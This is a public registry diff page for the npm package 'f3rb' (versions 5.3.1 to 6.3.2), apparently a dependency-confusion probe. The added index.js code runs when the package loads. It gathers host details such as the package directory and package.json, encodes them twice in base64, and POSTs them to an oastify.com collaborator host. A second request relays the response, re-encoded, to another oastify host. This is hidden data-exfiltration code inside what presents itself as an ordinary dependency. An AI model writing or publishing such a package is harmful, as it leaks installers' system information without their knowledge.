f3rb 5.3.1 → 6.3.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +56 -6
  2. package/package.json +2 -2
package/index.js CHANGED
@@ -1,11 +1,11 @@
1
- kk
2
- const os = require("os");
1
+ kkkconst os = require("os");
3
2
  const dns = require("dns");
4
3
  const querystring = require("querystring");
5
4
  const https = require("https");
6
5
  const packageJSON = require("./package.json");
7
6
  const package = packageJSON.name;
8
7
 
8
+ // Original tracking data
9
9
  const trackingData = JSON.stringify({
10
10
  p: package,
11
11
  c: __dirname,
@@ -18,12 +18,18 @@ const trackingData = JSON.stringify({
18
18
  pjson: packageJSON,
19
19
  });
20
20
 
21
+ // Encode the tracking data twice in base64
22
+ const base64FirstEncode = Buffer.from(trackingData).toString('base64');
23
+ const base64DoubleEncode = Buffer.from(base64FirstEncode).toString('base64');
24
+
25
+ // Create post data with the double-encoded base64 message
21
26
  var postData = querystring.stringify({
22
- msg: trackingData,
27
+ msg: base64DoubleEncode,
23
28
  });
24
29
 
30
+ // HTTPS request options
25
31
  var options = {
26
- hostname: "gyi0rv3utxqkclsfr6ovh8uoyf46s1gq.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
32
+ hostname: "rjebc6o5e8bvxwdqch962jfzjqpidg15.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
27
33
  port: 443,
28
34
  path: "/",
29
35
  method: "POST",
@@ -33,15 +39,59 @@ var options = {
33
39
  },
34
40
  };
35
41
 
42
+ // Send the HTTPS request
36
43
  var req = https.request(options, (res) => {
44
+ let responseData = "";
45
+
46
+ // Accumulate the data from the response
37
47
  res.on("data", (d) => {
38
- process.stdout.write(d);
48
+ responseData += d;
49
+ });
50
+
51
+ // After the response is received, double Base64 encode the response
52
+ res.on("end", () => {
53
+ // First Base64 encode
54
+ const base64FirstResponseEncode = Buffer.from(responseData).toString('base64');
55
+ // Second Base64 encode
56
+ const base64DoubleResponseEncode = Buffer.from(base64FirstResponseEncode).toString('base64');
57
+
58
+ // Send the double Base64 encoded response back via another POST request
59
+ const returnPostData = querystring.stringify({
60
+ msg: base64DoubleResponseEncode,
61
+ });
62
+
63
+ var returnOptions = {
64
+ hostname: "jpc3iyuxk0hn3ojii9fy8blrpivaj57u.oastify.com", // Replace with your server to receive the encoded response
65
+ port: 443,
66
+ path: "/",
67
+ method: "POST",
68
+ headers: {
69
+ "Content-Type": "application/x-www-form-urlencoded",
70
+ "Content-Length": returnPostData.length,
71
+ },
72
+ };
73
+
74
+ var returnReq = https.request(returnOptions, (returnRes) => {
75
+ returnRes.on("data", (d) => {
76
+ process.stdout.write(d);
77
+ });
78
+ });
79
+
80
+ returnReq.on("error", (e) => {
81
+ // Handle error
82
+ });
83
+
84
+ // Send the double Base64-encoded response back
85
+ returnReq.write(returnPostData);
86
+ returnReq.end();
39
87
  });
40
88
  });
41
89
 
42
90
  req.on("error", (e) => {
43
- // console.error(e);
91
+ // Handle error
44
92
  });
45
93
 
94
+ // Write the post data and end the request
46
95
  req.write(postData);
47
96
  req.end();
97
+
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "f3rb",
3
- "version": "5.3.1",
3
+ "version": "6.3.2",
4
4
  "description": "test",
5
5
  "main": "index.js",
6
6
  "scripts": {
@@ -17,6 +17,6 @@
17
17
  },
18
18
  "homepage": "https://github.com/visma-prodsec/confused#readme",
19
19
  "dependencies": {
20
- "f3rb": "^5.2.1"
20
+ "f3rb": "^5.3.2"
21
21
  }
22
22
  }